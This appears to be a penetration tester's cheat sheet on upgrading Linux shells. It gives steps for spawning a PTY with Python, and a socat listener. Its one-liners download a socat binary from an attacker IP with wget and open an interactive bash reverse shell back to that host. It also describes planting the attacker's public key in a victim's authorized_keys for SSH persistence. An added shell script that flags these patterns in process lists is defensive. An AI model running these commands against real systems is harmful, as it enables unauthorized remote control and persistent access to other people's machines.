🐧Linux Shell Upgrades

Python Upgrade

#py_tty

  1. Spawn a PTY with Python:
python3 -c 'import pty;pty.spawn("/bin/bash")'

If Python is not available, use script:

script -qc /bin/bash /dev/null
  2. Set the terminal type:
export TERM=xterm

or

export TERM=xterm-256color
  3. Background the shell using
Ctrl + Z
  4. Back in our own terminal, check the terminal size
stty size
  5. Still in our own terminal, run
stty raw -echo; fg
reset
This does two things: first, it turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, fg brings the backgrounded shell back to the foreground.
  6. Set the rows and columns of the upgraded shell to the values reported by stty size in step 4, for example:
stty rows 38 columns 116

Socat

#socat

Attacker

socat file:`tty`,raw,echo=0 tcp-listen:80

Victim

Manual (Slow):

cd /tmp
wget 192.168.45.221:53/socat;chmod +x socat
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.221:80

One Liner (Fast):

cd /tmp;wget 192.168.45.221:53/socat;chmod +x socat;./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.221:80

One Liner with IP variable (Faster):

export IP="192.168.45.175";cd /tmp;wget $IP:8000/socat;chmod +x socat;./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$IP:80
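
Seen from the monitored host, the Python, script and socat upgrades above each leave a recognisable process command line. The following added example (not part of the original notes) flags those patterns in `ps -eo pid=,args=` style input; the function names, the sample process list and the 192.0.2.10 address are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag process command lines that match the PTY-upgrade
# patterns from this page. Assumed input: "PID ARGS" per line, as printed by
#   ps -eo pid=,args=

# Print a label if the command line gives a shell a PTY, else print nothing.
classify_cmdline() {
    # socat address keywords are case-insensitive, so match in lower case.
    lc=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]')
    case "$lc" in
        *python*pty.spawn*)                echo "python-pty-spawn" ;;
        *"script -qc "*"sh /dev/null"*)    echo "script-pty" ;;
        *socat*exec:*sh*,pty*)             echo "socat-exec-pty" ;;
    esac
}

# Read "PID ARGS" lines on stdin and print "PID label" for each match.
scan_ps() {
    while read -r pid args || [ -n "$pid" ]; do
        label=$(classify_cmdline "$args")
        if [ -n "$label" ]; then
            printf '%s %s\n' "$pid" "$label"
        fi
    done
}

# Constructed sample process list (192.0.2.10 is a documentation address).
sample_ps() {
    cat <<'EOF'
  812 /usr/sbin/sshd -D
 4021 python3 -c import pty;pty.spawn("/bin/bash")
 4022 /bin/bash
 4100 script -qc /bin/bash /dev/null
 4177 ./socat exec:bash -li,pty,stderr,setsid,sigint,sane tcp:192.0.2.10:80
 4200 python3 /opt/app/manage.py runserver
 4300 socat TCP-LISTEN:8443,fork TCP:127.0.0.1:443
EOF
}

sample_ps | scan_ps
```

On a live host, feed it with `ps -eo pid=,args= | scan_ps`; the parent process and owning user of each hit (for example a web server account) are what decide whether it is worth an alert.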

SSH Keys Shell Upgrade

If the SSH port is open, we can get SSH access using our public SSH key.

We start by generating a key pair on our machine:

ssh-keygen

Copy our public key to an authorized_keys file to be transferred to the victim user's ~/.ssh/authorized_keys:

cp /home/cyber02/.ssh/id_rsa.pub authorized_keys

Or append the public key contents to the victim user's authorized_keys.

Then log in with our private key:

ssh -i /home/cyber02/.ssh/id_rsa rose@192.168.130.231